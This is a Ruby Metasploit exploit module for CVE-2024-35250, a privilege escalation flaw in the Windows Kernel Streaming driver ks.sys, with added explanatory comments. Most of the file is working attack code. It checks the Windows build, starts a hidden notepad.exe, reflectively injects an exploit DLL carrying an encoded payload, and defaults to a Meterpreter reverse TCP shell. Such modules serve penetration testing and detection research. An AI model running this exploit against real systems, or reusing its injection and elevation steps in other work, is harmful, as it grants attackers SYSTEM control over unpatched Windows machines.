##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation module for CVE-2024-35250, an access-mode
  # mismatch in the Windows Kernel Streaming driver ks.sys. The module
  # checks that the target is 64-bit Windows, that ks.sys is present and
  # that the build number lies in one of the supported ranges, then hosts
  # the exploit DLL in a hidden notepad.exe process and passes it the
  # encoded payload.
  Rank = ExcellentRanking

  # Mixins providing the helpers used below: file?/get_env (File),
  # is_system? (Priv), process execution and the notepad lookup (Process),
  # execute_dll (ReflectiveDLLInjection) and get_version_info (Version).
  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Version
  # AutoCheck runs #check before #exploit; the guard in #exploit re-runs the
  # compatibility check itself when AutoCheck is off or ForceExploit is set.
  prepend Msf::Exploit::Remote::AutoCheck

  # Raised by #target_compatible? and rescued in #check / #exploit so an
  # incompatible host is reported as Safe / NoTarget instead of escaping
  # as an unhandled exception.
  class VulnerableDriverNotPresent < StandardError; end
  class TargetNot64BitWindows < StandardError; end

  # Registers the module metadata (name, references, platform, targets,
  # default payload and stability notes).
  #
  # @param info [Hash] metadata supplied by the framework, merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Access Mode Mismatch LPE in ks.sys',
        'Description' => %q{
The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.
There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,
Windows 11, Windows Server 2022.
        },
        'Author' => [
          'AngelBoy', # discovery
          'varwara', # PoC
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://github.com/varwara/CVE-2024-35250'],
          [ 'URL', 'https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/'],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html'],
          [ 'CVE', '2024-35250']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Privileged' => true,
        # Only the x64 build of the exploit DLL ships with the module
        # (see the data-directory path in #exploit).
        'Arch' => [ ARCH_X64 ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-06-11',
        # Stability notes: the module is declared crash-safe, leaves
        # artifacts on disk and can be re-run for another session.
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
  end

  # Decides whether the session's host matches the module's support matrix.
  #
  # The decision is based only on platform/architecture, the presence of
  # %WINDIR%\system32\drivers\ks.sys and the OS build number; the file
  # version or patch level of ks.sys itself is not inspected, so a patched
  # host in a listed build range is still reported as compatible.
  #
  # @param version [Object] result of get_version_info; must respond to build_number
  # @return [Boolean] true when the build number is within Win10 1607..22H2,
  #   equals Win11 21H2 or 22H2, or is within Server 2016..Server 2022;
  #   any other build falls through to false
  # @raise [TargetNot64BitWindows] when the session is not Windows or the
  #   architecture is not x64
  # @raise [VulnerableDriverNotPresent] when ks.sys is not found under
  #   system32\drivers
  def target_compatible?(version)
    raise TargetNot64BitWindows, 'Non 64-bit Windows systems are not affected' unless session.platform == 'windows' && sysinfo['Architecture'] == ARCH_X64
    # NOTE(review): if get_env('WINDIR') returned nil the `+` below would
    # raise NoMethodError rather than one of the module's own errors.
    file_path = get_env('WINDIR') + '\\system32\\drivers\\ks.sys'
    raise VulnerableDriverNotPresent, 'The target system does not have ks.sys in system32\\drivers\\' unless file?(file_path)
    vprint_status("Windows Build Number = #{version.build_number}")
    return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2)
    return true if version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Win11_22H2
    return true if version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2022)
    false
  end

  # Vulnerability check used by AutoCheck and the `check` command.
  #
  # Returns Appears (not Vulnerable) because only driver presence and build
  # number are examined; the driver's patch state is not confirmed. Errors
  # raised by #target_compatible? are translated into Safe; note that
  # get_version_info itself runs outside the rescue.
  #
  # @return [Exploit::CheckCode] Appears when compatible, otherwise Safe
  def check
    version = get_version_info
    begin
      return Exploit::CheckCode::Appears("ks.sys is present, Windows Version detected: #{version}") if target_compatible?(version)
    rescue VulnerableDriverNotPresent, TargetNot64BitWindows => e
      return Exploit::CheckCode::Safe("#{e.class}: #{e.message}")
    end
    CheckCode::Safe("Version detected: #{version}")
  end

  # Runs the exploit: aborts if the session is already SYSTEM, repeats the
  # compatibility check when AutoCheck did not, launches a hidden notepad.exe
  # and injects the exploit DLL into it together with the encoded payload.
  #
  # From a detection standpoint the observable artifacts are the hidden
  # notepad.exe child of the session process and the DLL reflectively
  # loaded into it.
  #
  # @return [void]
  def exploit
    fail_with(Failure::None, 'Session is already elevated') if is_system?
    # AutoCheck already called #check unless it was disabled or overridden;
    # in those cases re-validate the target here.
    if datastore['ForceExploit'] || !datastore['AutoCheck']
      begin
        version = get_version_info
        fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}") unless target_compatible?(version)
        print_good("ks.sys is present, Windows Version detected: #{version}")
      rescue VulnerableDriverNotPresent, TargetNot64BitWindows => e
        fail_with(Failure::NoTarget, "#{e.class}: #{e.message}")
      end
    end
    print_status('Launching notepad to host the exploit...')
    notepad_path = get_notepad_pathname(ARCH_X64, client.sys.config.getenv('windir'), ARCH_X64)
    print_status("The notepad path is: #{notepad_path}")
    # Hidden window: the process exists only as a host for the DLL.
    notepad_process = client.sys.process.execute(notepad_path, nil, { 'Hidden' => true })
    print_status("The notepad pid is: #{notepad_process.pid}")
    encoded_payload = payload.encoded
    # The DLL receives the payload prefixed with its length as a
    # little-endian unsigned int (pack 'I<').
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-35250', 'CVE-2024-35250.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload,
      notepad_process.pid
    )
  end
end